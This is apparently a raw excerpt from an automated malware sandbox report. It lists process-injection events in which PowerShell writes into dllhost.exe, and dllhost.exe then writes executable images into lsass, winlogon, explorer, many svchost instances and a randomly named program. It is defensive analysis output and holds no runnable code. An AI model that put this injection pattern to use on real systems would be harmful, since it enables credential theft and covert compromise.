                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 800000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: C00000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2CA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2870000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2BB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F50000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 11D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1170000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 10A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1420000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 13E0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F00000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EE0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: ED0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1220000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B80000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: DC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1020000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 28C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D00000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EF0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 23F0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E70000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18DFB160000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE470000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1D6EE4A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 7DB0000 value: 4DJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 2852Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: F2CC2D6010Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAE230000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 7DB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DEA1600000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\MoUsoCoreWorker.exe base: 1C5C4260000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23A94D50000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF36C0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 173E6B70000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 166801F0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 3020000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1EB71E60000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3ED0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 227B9BA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 232E3380000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C06DDB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECA6970000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1010000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2AE0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A60000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: A90000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DF0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 9E0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: AA0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FE0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3100000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B90000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: BB0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C20000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E60000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 24A0000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 850000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: D00000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 840000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1460000Jump to behavior
